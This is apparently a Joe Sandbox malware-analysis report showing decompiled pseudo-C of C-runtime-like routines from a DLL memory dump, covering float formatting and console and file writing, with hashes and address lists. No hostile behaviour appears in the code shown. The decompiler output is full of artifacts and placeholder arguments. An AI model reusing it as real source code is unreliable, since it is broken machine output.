                                                                      0x180011744

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: a1d44945871e1f0e730c32dde90860bcfa3aea57d1cd090b738d4b87d6dc0a93
                                                                      • Instruction ID: 10efbe0da98848f7cb1ac039a4d60ff939f9beb912c3c8be4bdd1aadd2a3d43d
                                                                      • Opcode Fuzzy Hash: a1d44945871e1f0e730c32dde90860bcfa3aea57d1cd090b738d4b87d6dc0a93
                                                                      • Instruction Fuzzy Hash: 0B51B036104A88CAEBBA8F11D5443D977A1F398BCAF18C116FA9947BD5CF38C659CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E0000000118000988C(void* __edx, long long __rbx, signed int* __rcx, long long __rsi, void* __r10, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				char _v104;
                                                                      				intOrPtr _v112;
                                                                      				char _v120;
                                                                      				void* _t28;
                                                                      				void* _t31;
                                                                      				signed long long _t40;
                                                                      				signed int* _t45;
                                                                      				intOrPtr* _t48;
                                                                      				long long _t53;
                                                                      				signed int* _t56;
                                                                      				void* _t65;
                                                                      				void* _t69;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t40 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v24 = _t40 ^ _t65 - 0x00000090;
                                                                      				_t45 = __rcx;
                                                                      				_t48 =  *0x80071308; // 0x0
                                                                      				_t31 = __edx;
                                                                      				if ( *_t48 != sil) goto 0x800098d2;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                      				goto 0x80009987;
                                                                      				if ( *0x8005f780 - 0x30 - 9 > 0) goto 0x800098fa;
                                                                      				 *0x80071308 = 0x18005f781;
                                                                      				E00000001180005B90( *0x8005f780 - 0x2f, __rcx,  *0x8005f780 - 0x2f, __rsi, __r10);
                                                                      				goto 0x8000998a;
                                                                      				E0000000118000D230(_t28,  &_v120,  *0x8005f780 - 0x2f);
                                                                      				_t53 =  *0x80071308; // 0x0
                                                                      				if (_v112 == sil) goto 0x8000996e;
                                                                      				 *0x80071308 = _t53 + 1;
                                                                      				if (_t31 != 0x42) goto 0x8000995e;
                                                                      				asm("movsd xmm3, [esp+0x20]");
                                                                      				asm("dec cx");
                                                                      				E0000000118000DE70(_t28, _v120,  &_v104,  *0x8005f780 - 0x2f, "%lf", _t69);
                                                                      				r8b = sil;
                                                                      				_t56 = _t45;
                                                                      				E00000001180005388(_t56,  &_v104);
                                                                      				goto 0x8000998a;
                                                                      				if (_t31 != 0x41) goto 0x8000996e;
                                                                      				asm("movss xmm3, [esp+0x20]");
                                                                      				asm("cvtps2pd xmm3, xmm3");
                                                                      				goto 0x80009931;
                                                                      				_t58 =  !=  ? __rsi : 0x8005f780;
                                                                      				asm("sbb eax, eax");
                                                                      				_t45[2] =  ~( *_t56) & 0x00000002;
                                                                      				 *_t45 =  !=  ? __rsi : 0x8005f780;
                                                                      				return E000000011800028F0( ~( *_t56) & 0x00000002, _t28, _v24 ^ _t65 - 0x00000090);
                                                                      			}

















                                                                      0x18000988c
                                                                      0x180009891
                                                                      0x18000989e
                                                                      0x1800098a8
                                                                      0x1800098b0
                                                                      0x1800098b5
                                                                      0x1800098bc
                                                                      0x1800098c1
                                                                      0x1800098c3
                                                                      0x1800098cd
                                                                      0x1800098d8
                                                                      0x1800098e3
                                                                      0x1800098f0
                                                                      0x1800098f5
                                                                      0x1800098ff
                                                                      0x180009904
                                                                      0x180009910
                                                                      0x18000991a
                                                                      0x180009929
                                                                      0x18000992b
                                                                      0x180009931
                                                                      0x180009947
                                                                      0x18000994c
                                                                      0x180009954
                                                                      0x180009957
                                                                      0x18000995c
                                                                      0x180009961
                                                                      0x180009963
                                                                      0x180009969
                                                                      0x18000996c
                                                                      0x180009979
                                                                      0x18000997f
                                                                      0x180009984
                                                                      0x180009987
                                                                      0x1800099b1

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: NameName::
                                                                      • String ID: %lf
                                                                      • API String ID: 1333004437-2891890143
                                                                      • Opcode ID: eab38ba3475e6ecf9f58ae6052c18eec6b2d41795ba4e15b638c4a922cb1f8c2
                                                                      • Instruction ID: 625642c073bd378e82aa64b76f57d1883ee8e53c4ab1f2630025a7957362ccb0
                                                                      • Opcode Fuzzy Hash: eab38ba3475e6ecf9f58ae6052c18eec6b2d41795ba4e15b638c4a922cb1f8c2
                                                                      • Instruction Fuzzy Hash: D4319032608A8884EBA2CB64E8503EA77A0F38DBC4F54C115F99D47745CF3CC7498740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E0000000118005393C(void* __ecx, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t182;
                                                                      				signed int _t186;
                                                                      				signed int _t193;
                                                                      				signed int _t198;
                                                                      				void* _t212;
                                                                      				signed char _t213;
                                                                      				void* _t262;
                                                                      				signed long long _t263;
                                                                      				signed long long _t266;
                                                                      				long long _t268;
                                                                      				signed long long _t270;
                                                                      				long long _t275;
                                                                      				long long _t277;
                                                                      				long long _t279;
                                                                      				intOrPtr* _t288;
                                                                      				intOrPtr _t293;
                                                                      				long long _t294;
                                                                      				long long _t317;
                                                                      				void* _t325;
                                                                      				long long _t326;
                                                                      				void* _t327;
                                                                      				long long _t328;
                                                                      				intOrPtr* _t329;
                                                                      				long long _t330;
                                                                      				signed char* _t331;
                                                                      				signed char* _t332;
                                                                      				signed char* _t333;
                                                                      				intOrPtr* _t334;
                                                                      				void* _t335;
                                                                      				void* _t336;
                                                                      				signed long long _t337;
                                                                      				intOrPtr _t340;
                                                                      				signed long long _t342;
                                                                      				void* _t344;
                                                                      				intOrPtr* _t346;
                                                                      				intOrPtr _t350;
                                                                      				signed long long _t355;
                                                                      				signed long long _t358;
                                                                      				signed long long _t360;
                                                                      				void* _t363;
                                                                      				long long _t364;
                                                                      				long long _t366;
                                                                      				char _t367;
                                                                      				void* _t371;
                                                                      				signed char* _t372;
                                                                      				signed long long _t374;
                                                                      
                                                                      				_t262 = _t336;
                                                                      				_t335 = _t262 - 0x57;
                                                                      				_t337 = _t336 - 0xe0;
                                                                      				 *((long long*)(_t335 - 9)) = 0xfffffffe;
                                                                      				 *((long long*)(_t262 + 8)) = __rbx;
                                                                      				_t263 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t335 + 0x17) = _t263 ^ _t337;
                                                                      				_t329 = __r8;
                                                                      				 *((long long*)(_t335 - 0x49)) = __r8;
                                                                      				_t288 = __rcx;
                                                                      				_t366 =  *((intOrPtr*)(_t335 + 0x7f));
                                                                      				 *((long long*)(_t335 - 0x51)) = _t366;
                                                                      				 *(_t335 - 0x19) = __edx;
                                                                      				_t266 = __edx >> 6;
                                                                      				 *(_t335 - 0x59) = _t266;
                                                                      				 *(_t335 - 0x11) = __edx;
                                                                      				_t374 = __edx + __edx * 8;
                                                                      				_t15 = _t266 * 8; // 0xb10668ec4f00d736
                                                                      				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + _t15 + 0x71840)) + 0x28 + _t374 * 8));
                                                                      				 *((long long*)(_t335 - 0x29)) = _t268;
                                                                      				r12d = r9d;
                                                                      				_t364 = _t363 + __r8;
                                                                      				 *((long long*)(_t335 - 0x71)) = _t364;
                                                                      				 *((intOrPtr*)(_t335 - 0x61)) = GetConsoleOutputCP();
                                                                      				if ( *((intOrPtr*)(_t366 + 0x28)) != dil) goto 0x800539dc;
                                                                      				E000000011800338E0(_t268, __rcx, _t366, 0x180000000, __r8);
                                                                      				_t24 = _t366 + 0x18; // 0x4c08245c8948cccc
                                                                      				_t293 =  *_t24;
                                                                      				r8d =  *(_t293 + 0xc);
                                                                      				 *(_t335 - 0x5d) = r8d;
                                                                      				 *_t288 = _t268;
                                                                      				 *((intOrPtr*)(_t288 + 8)) = 0;
                                                                      				if ( *((intOrPtr*)(_t335 - 0x49)) - _t364 >= 0) goto 0x80053d9c;
                                                                      				_t270 = __edx >> 6;
                                                                      				 *(_t335 - 0x21) = _t270;
                                                                      				 *((char*)(_t337 + 0x40)) =  *_t329;
                                                                      				 *((intOrPtr*)(_t335 - 0x7d)) = 0;
                                                                      				r12d = 1;
                                                                      				if (r8d != 0xfde9) goto 0x80053ba4;
                                                                      				_t346 = 0x3e + _t374 * 8 +  *((intOrPtr*)(0x180000000 + 0x71840 + _t270 * 8));
                                                                      				if ( *_t346 == dil) goto 0x80053a58;
                                                                      				_t371 = _t328 + 1;
                                                                      				if (_t371 - 5 < 0) goto 0x80053a45;
                                                                      				if (_t371 == 0) goto 0x80053b36;
                                                                      				r12d =  *((char*)(_t293 + 0x1800709e0));
                                                                      				r12d = r12d + 1;
                                                                      				_t182 = r12d - 1;
                                                                      				 *((intOrPtr*)(_t335 - 0x69)) = _t182;
                                                                      				_t340 = _t182;
                                                                      				if (_t340 -  *((intOrPtr*)(_t335 - 0x71)) - _t329 > 0) goto 0x80053d0b;
                                                                      				_t294 = _t328;
                                                                      				 *((char*)(_t335 + _t294 - 1)) =  *_t346;
                                                                      				if (_t294 + 1 - _t371 < 0) goto 0x80053a9d;
                                                                      				if (_t340 <= 0) goto 0x80053ace;
                                                                      				E00000001180003FF0();
                                                                      				_t317 = _t328;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x71840 +  *(_t335 - 0x59) * 8)) + _t317 + 0x3e + _t374 * 8)) = dil;
                                                                      				if (_t317 + 1 - _t371 < 0) goto 0x80053ad1;
                                                                      				 *((long long*)(_t335 - 0x41)) = _t328;
                                                                      				_t275 = _t335 - 1;
                                                                      				 *((long long*)(_t335 - 0x39)) = _t275;
                                                                      				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                      				r12d = _t186;
                                                                      				r8d = _t186;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t366;
                                                                      				E000000011800507CC(_t275, _t288, _t335 - 0x7d, _t335 - 0x39, _t340, _t335 - 0x41);
                                                                      				if (_t275 == 0xffffffff) goto 0x80053d9c;
                                                                      				_t330 = _t329 +  *((intOrPtr*)(_t335 - 0x69)) - 1;
                                                                      				goto 0x80053c39;
                                                                      				_t367 =  *((char*)(_t275 + 0x1800709e0));
                                                                      				_t212 = _t367 + 1;
                                                                      				_t342 =  *((intOrPtr*)(_t335 - 0x71)) - _t330;
                                                                      				if (_t212 - _t342 > 0) goto 0x80053d39;
                                                                      				 *((long long*)(_t335 - 0x69)) = _t328;
                                                                      				 *((long long*)(_t335 - 0x31)) = _t330;
                                                                      				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                      				r14d = _t193;
                                                                      				r8d = _t193;
                                                                      				_t277 =  *((intOrPtr*)(_t335 - 0x51));
                                                                      				 *((long long*)(_t337 + 0x20)) = _t277;
                                                                      				E000000011800507CC(_t277, _t288, _t335 - 0x7d, _t335 - 0x31, _t342, _t335 - 0x69);
                                                                      				if (_t277 == 0xffffffff) goto 0x80053d9c;
                                                                      				_t331 = _t330 + _t367;
                                                                      				r12d = r14d;
                                                                      				_t368 =  *((intOrPtr*)(_t335 - 0x51));
                                                                      				goto 0x80053c39;
                                                                      				_t358 =  *(_t335 - 0x59);
                                                                      				_t350 =  *((intOrPtr*)(0x180000000 + 0x71840 + _t358 * 8));
                                                                      				_t213 =  *(_t350 + 0x3d + _t374 * 8);
                                                                      				if ((_t213 & 0x00000004) == 0) goto 0x80053bdb;
                                                                      				 *((char*)(_t335 + 7)) =  *((intOrPtr*)(_t350 + 0x3e + _t374 * 8));
                                                                      				 *((char*)(_t335 + 8)) =  *_t331;
                                                                      				 *(_t350 + 0x3d + _t374 * 8) = _t213 & 0x000000fb;
                                                                      				r8d = 2;
                                                                      				goto 0x80053c24;
                                                                      				r8d =  *_t331 & 0x000000ff;
                                                                      				_t102 = _t368 + 0x18; // 0x4c08245c8948cccc
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)( *_t102)) + _t342 * 2)) >= 0) goto 0x80053c1e;
                                                                      				_t372 =  &(_t331[1]);
                                                                      				if (_t372 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x80053d77;
                                                                      				r8d = 2;
                                                                      				if (E00000001180040E3C(_t213 & 0x000000fb, __ebp, _t288, _t335 - 0x7d, _t331, _t328, _t331, _t335, _t342,  *((intOrPtr*)(_t335 - 0x51))) == 0xffffffff) goto 0x80053d9c;
                                                                      				_t332 = _t372;
                                                                      				goto 0x80053c39;
                                                                      				_t198 = E00000001180040E3C(_t213 & 0x000000fb, __ebp, _t288, _t335 - 0x7d, _t332, _t328, _t332, _t335, _t364,  *((intOrPtr*)(_t335 - 0x51)));
                                                                      				if (_t198 == 0xffffffff) goto 0x80053d9c;
                                                                      				_t333 =  &(_t332[1]);
                                                                      				 *((long long*)(_t337 + 0x38)) = _t328;
                                                                      				 *((long long*)(_t337 + 0x30)) = _t328;
                                                                      				 *((intOrPtr*)(_t337 + 0x28)) = 5;
                                                                      				_t279 = _t335 + 0xf;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t279;
                                                                      				r9d = r12d;
                                                                      				_t344 = _t335 - 0x7d;
                                                                      				E00000001180045774();
                                                                      				r14d = _t198;
                                                                      				if (_t198 == 0) goto 0x80053d9c;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t328;
                                                                      				r8d = _t198;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x80053d94;
                                                                      				_t121 = _t288 + 8; // 0x245c8b48c78b0002
                                                                      				 *((intOrPtr*)(_t288 + 4)) = __esi -  *((intOrPtr*)(_t335 - 0x49)) +  *_t121;
                                                                      				if ( *((intOrPtr*)(_t335 - 0x79)) - r14d < 0) goto 0x80053d9c;
                                                                      				if ( *((char*)(_t337 + 0x40)) != 0xa) goto 0x80053cf4;
                                                                      				 *((short*)(_t337 + 0x40)) = 0xd;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t328;
                                                                      				_t128 = _t279 - 0xc; // 0x1
                                                                      				r8d = _t128;
                                                                      				_t325 = _t337 + 0x40;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x80053d94;
                                                                      				if ( *((intOrPtr*)(_t335 - 0x79)) - 1 < 0) goto 0x80053d9c;
                                                                      				 *((intOrPtr*)(_t288 + 8)) =  *((intOrPtr*)(_t288 + 8)) + 1;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + 1;
                                                                      				_t135 = _t288 + 4; // 0xc78b0002c044e80b
                                                                      				if (_t333 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x80053d9c;
                                                                      				r8d =  *(_t335 - 0x5d);
                                                                      				goto 0x80053a07;
                                                                      				if (_t325 <= 0) goto 0x80053d34;
                                                                      				_t334 = _t333 - _t372;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x71840 + _t358 * 8)) + _t372 + 0x3e + _t374 * 8)) =  *((intOrPtr*)(_t334 + _t372));
                                                                      				if (1 - _t325 < 0) goto 0x80053d13;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) +  *_t135;
                                                                      				goto 0x80053d9c;
                                                                      				if (_t344 <= 0) goto 0x80053d71;
                                                                      				_t326 = _t328;
                                                                      				_t360 =  *(_t335 - 0x19) >> 6;
                                                                      				_t355 =  *(_t335 - 0x11) +  *(_t335 - 0x11) * 8;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x71840 + _t360 * 8)) + _t355 * 8 + _t326 + 0x3e)) =  *((intOrPtr*)(_t326 + _t334));
                                                                      				_t327 = _t326 + 1;
                                                                      				if (2 - _t344 < 0) goto 0x80053d51;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + r8d;
                                                                      				goto 0x80053d9c;
                                                                      				 *((char*)(_t355 + 0x3e + _t374 * 8)) =  *_t334;
                                                                      				 *( *((intOrPtr*)(0x180000000 + 0x71840 + _t360 * 8)) + 0x3d + _t374 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x71840 + _t360 * 8)) + 0x3d + _t374 * 8) | 0x00000004;
                                                                      				_t174 = _t327 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t288 + 4)) = _t174;
                                                                      				goto 0x80053d9c;
                                                                      				 *_t288 = GetLastError();
                                                                      				return E000000011800028F0(_t206,  *((intOrPtr*)(_t335 - 0x61)),  *(_t335 + 0x17) ^ _t337);
                                                                      			}




















































                                                                      0x18005393c
                                                                      0x18005394a
                                                                      0x18005394e
                                                                      0x180053955
                                                                      0x18005395d
                                                                      0x180053961
                                                                      0x18005396b
                                                                      0x18005396f
                                                                      0x180053972
                                                                      0x180053979
                                                                      0x18005397c
                                                                      0x180053980
                                                                      0x180053987
                                                                      0x18005398e
                                                                      0x180053992
                                                                      0x1800539a0
                                                                      0x1800539a4
                                                                      0x1800539a8
                                                                      0x1800539b0
                                                                      0x1800539b5
                                                                      0x1800539b9
                                                                      0x1800539bc
                                                                      0x1800539bf
                                                                      0x1800539c9
                                                                      0x1800539d2
                                                                      0x1800539d7
                                                                      0x1800539dc
                                                                      0x1800539dc
                                                                      0x1800539e0
                                                                      0x1800539e4
                                                                      0x1800539ea
                                                                      0x1800539ed
                                                                      0x1800539f4
                                                                      0x1800539fd
                                                                      0x180053a01
                                                                      0x180053a09
                                                                      0x180053a0d
                                                                      0x180053a10
                                                                      0x180053a24
                                                                      0x180053a3f
                                                                      0x180053a48
                                                                      0x180053a4c
                                                                      0x180053a56
                                                                      0x180053a5b
                                                                      0x180053a73
                                                                      0x180053a7c
                                                                      0x180053a82
                                                                      0x180053a84
                                                                      0x180053a8e
                                                                      0x180053a94
                                                                      0x180053a9a
                                                                      0x180053aa0
                                                                      0x180053aad
                                                                      0x180053ab2
                                                                      0x180053abe
                                                                      0x180053ace
                                                                      0x180053adc
                                                                      0x180053ae7
                                                                      0x180053ae9
                                                                      0x180053aed
                                                                      0x180053af1
                                                                      0x180053afe
                                                                      0x180053b00
                                                                      0x180053b03
                                                                      0x180053b06
                                                                      0x180053b17
                                                                      0x180053b20
                                                                      0x180053b2e
                                                                      0x180053b31
                                                                      0x180053b39
                                                                      0x180053b42
                                                                      0x180053b4a
                                                                      0x180053b53
                                                                      0x180053b59
                                                                      0x180053b5d
                                                                      0x180053b69
                                                                      0x180053b6b
                                                                      0x180053b6e
                                                                      0x180053b71
                                                                      0x180053b75
                                                                      0x180053b86
                                                                      0x180053b8f
                                                                      0x180053b95
                                                                      0x180053b98
                                                                      0x180053b9b
                                                                      0x180053b9f
                                                                      0x180053ba4
                                                                      0x180053ba8
                                                                      0x180053bb0
                                                                      0x180053bb8
                                                                      0x180053bbf
                                                                      0x180053bc4
                                                                      0x180053bca
                                                                      0x180053bcf
                                                                      0x180053bd9
                                                                      0x180053bdb
                                                                      0x180053bdf
                                                                      0x180053beb
                                                                      0x180053bed
                                                                      0x180053bf5
                                                                      0x180053bfe
                                                                      0x180053c13
                                                                      0x180053c19
                                                                      0x180053c1c
                                                                      0x180053c2b
                                                                      0x180053c33
                                                                      0x180053c39
                                                                      0x180053c3c
                                                                      0x180053c41
                                                                      0x180053c46
                                                                      0x180053c4e
                                                                      0x180053c52
                                                                      0x180053c57
                                                                      0x180053c5a
                                                                      0x180053c63
                                                                      0x180053c68
                                                                      0x180053c6d
                                                                      0x180053c73
                                                                      0x180053c7c
                                                                      0x180053c92
                                                                      0x180053c9d
                                                                      0x180053ca0
                                                                      0x180053ca7
                                                                      0x180053cb2
                                                                      0x180053cb9
                                                                      0x180053cbe
                                                                      0x180053cc7
                                                                      0x180053cc7
                                                                      0x180053ccb
                                                                      0x180053cdb
                                                                      0x180053ce5
                                                                      0x180053ceb
                                                                      0x180053cee
                                                                      0x180053cf1
                                                                      0x180053cf8
                                                                      0x180053d02
                                                                      0x180053d06
                                                                      0x180053d0e
                                                                      0x180053d10
                                                                      0x180053d22
                                                                      0x180053d32
                                                                      0x180053d34
                                                                      0x180053d37
                                                                      0x180053d3c
                                                                      0x180053d3e
                                                                      0x180053d45
                                                                      0x180053d4d
                                                                      0x180053d60
                                                                      0x180053d66
                                                                      0x180053d6f
                                                                      0x180053d71
                                                                      0x180053d75
                                                                      0x180053d79
                                                                      0x180053d86
                                                                      0x180053d8c
                                                                      0x180053d8f
                                                                      0x180053d92
                                                                      0x180053d9a
                                                                      0x180053dc5

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: b24916662f5fef4a2e026c99922b247b76ec9e2b6b1942385179adbc646187c7
                                                                      • Instruction ID: e31836adf4fe3831468267aad999e107d356d2a78333450d7b99c0f1c8ff7982
                                                                      • Opcode Fuzzy Hash: b24916662f5fef4a2e026c99922b247b76ec9e2b6b1942385179adbc646187c7
                                                                      • Instruction Fuzzy Hash: DDD1B032704A888AE792CF79D4413DC7BB1F3487D8F148216EE59A7B99DE35C65AC700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 31%
                                                                      			E00000001180054464(void* __ebx, signed int __ecx, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                      				signed short _v80;
                                                                      				void* _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				long _v112;
                                                                      				signed int _v120;
                                                                      				long long _v128;
                                                                      				signed int _v136;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t107;
                                                                      				long _t116;
                                                                      				signed int _t117;
                                                                      				void* _t122;
                                                                      				signed int _t128;
                                                                      				intOrPtr _t146;
                                                                      				intOrPtr _t147;
                                                                      				void* _t168;
                                                                      				signed long long _t181;
                                                                      				signed long long _t185;
                                                                      				signed long long _t188;
                                                                      				signed long long _t207;
                                                                      				signed int _t208;
                                                                      				void* _t209;
                                                                      				void* _t211;
                                                                      				void* _t227;
                                                                      				signed long long _t228;
                                                                      				signed short* _t229;
                                                                      				void* _t230;
                                                                      				signed short* _t231;
                                                                      
                                                                      				_t122 = __ebx;
                                                                      				r15d = r8d;
                                                                      				_t185 = __r9;
                                                                      				_t229 = __rdx;
                                                                      				if (r8d == 0) goto 0x80054761;
                                                                      				if (__rdx != 0) goto 0x800544cb;
                                                                      				 *((char*)(__r9 + 0x38)) = 1;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                      				 *((char*)(__r9 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                      				r9d = 0;
                                                                      				_v128 = __r9;
                                                                      				_v136 = _t208;
                                                                      				E00000001180013858(__rax, __r9, __rcx, __rdx, _t209, _t211, __r8);
                                                                      				goto 0x80054763;
                                                                      				_t188 = __ecx >> 6;
                                                                      				_v120 = _t188;
                                                                      				_t228 = __ecx + __ecx * 8;
                                                                      				_t15 = _t209 - 1; // 0x8b0000e84ae8cf8a
                                                                      				if (_t15 - 1 > 0) goto 0x80054501;
                                                                      				if (( !r15d & 0x00000001) == 0) goto 0x80054494;
                                                                      				if (( *( *((intOrPtr*)(0x80071840 + _t188 * 8)) + 0x38 + _t228 * 8) & 0x00000020) == 0) goto 0x80054517;
                                                                      				r8d = 0x180071842;
                                                                      				0x800570fc();
                                                                      				_v96 = _t208;
                                                                      				if (E0000000118005192C(r12d, __ecx) == 0) goto 0x8005464d;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _v120 * 8)) + 0x38 + _t228 * 8)) - dil >= 0) goto 0x8005464d;
                                                                      				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8005455e;
                                                                      				E000000011800338E0( *((intOrPtr*)(0x80071840 + _v120 * 8)), __r9, __r9, _v120, _t209);
                                                                      				_t33 = _t185 + 0x18; // 0x4c08245c8948cccc
                                                                      				if ( *((intOrPtr*)( *_t33 + 0x138)) != _t208) goto 0x8005457a;
                                                                      				_t181 =  *((intOrPtr*)(0x80071840 + _v120 * 8));
                                                                      				if ( *((intOrPtr*)(_t181 + 0x39 + _t228 * 8)) == dil) goto 0x8005464d;
                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x80054642;
                                                                      				if (sil == 0) goto 0x8005461f;
                                                                      				sil = sil - 1;
                                                                      				if (sil - 1 > 0) goto 0x800546e6;
                                                                      				_t227 = _t229 + _t230;
                                                                      				_v112 = _t208;
                                                                      				_t231 = _t229;
                                                                      				if (_t229 - _t227 >= 0) goto 0x800546dc;
                                                                      				_v80 =  *_t231 & 0x0000ffff;
                                                                      				_t107 = E00000001180057AC0( *_t231 & 0xffff);
                                                                      				_t128 = _v80 & 0x0000ffff;
                                                                      				if (_t107 != _t128) goto 0x80054611;
                                                                      				_t146 = _v108 + 2;
                                                                      				_v108 = _t146;
                                                                      				if (_t128 != 0xa) goto 0x80054602;
                                                                      				if (E00000001180057AC0(0xd) != 0xd) goto 0x80054611;
                                                                      				_t147 = _t146 + 1;
                                                                      				_v108 = _t147;
                                                                      				if ( &(_t231[1]) - _t227 >= 0) goto 0x800546dc;
                                                                      				goto 0x800545c2;
                                                                      				_v112 = GetLastError();
                                                                      				goto 0x800546dc;
                                                                      				r9d = r15d;
                                                                      				_v136 = __r9;
                                                                      				E0000000118005393C(0xd, r12d, _t147, __ebp, __r9,  &_v112, _t229);
                                                                      				asm("movsd xmm0, [eax]");
                                                                      				goto 0x800546e1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x80071840 + _v120 * 8)) + 0x38 + _t228 * 8)) - dil >= 0) goto 0x800546a9;
                                                                      				_t168 = sil;
                                                                      				if (_t168 == 0) goto 0x80054695;
                                                                      				if (_t168 == 0) goto 0x80054681;
                                                                      				if (_t147 - 1 != 1) goto 0x800546f1;
                                                                      				r9d = r15d;
                                                                      				E00000001180054008(_t122, r12d, _t181, _t185,  &_v112, _t211, _t229);
                                                                      				goto 0x80054636;
                                                                      				r9d = r15d;
                                                                      				E00000001180054124(r12d,  *((intOrPtr*)(_t181 + 8)), _t181, _t185,  &_v112, _t211, _t229);
                                                                      				goto 0x80054636;
                                                                      				r9d = r15d;
                                                                      				E00000001180053F04(_t122, r12d, _t181, _t185,  &_v112, _t211, _t229);
                                                                      				goto 0x80054636;
                                                                      				r8d = r15d;
                                                                      				_v136 = _v136 & _t181;
                                                                      				_v112 = _t181;
                                                                      				_v104 = 0;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x800546d9;
                                                                      				_t116 = GetLastError();
                                                                      				_v112 = _t116;
                                                                      				asm("movsd xmm0, [ebp-0x30]");
                                                                      				asm("movsd [ebp-0x20], xmm0");
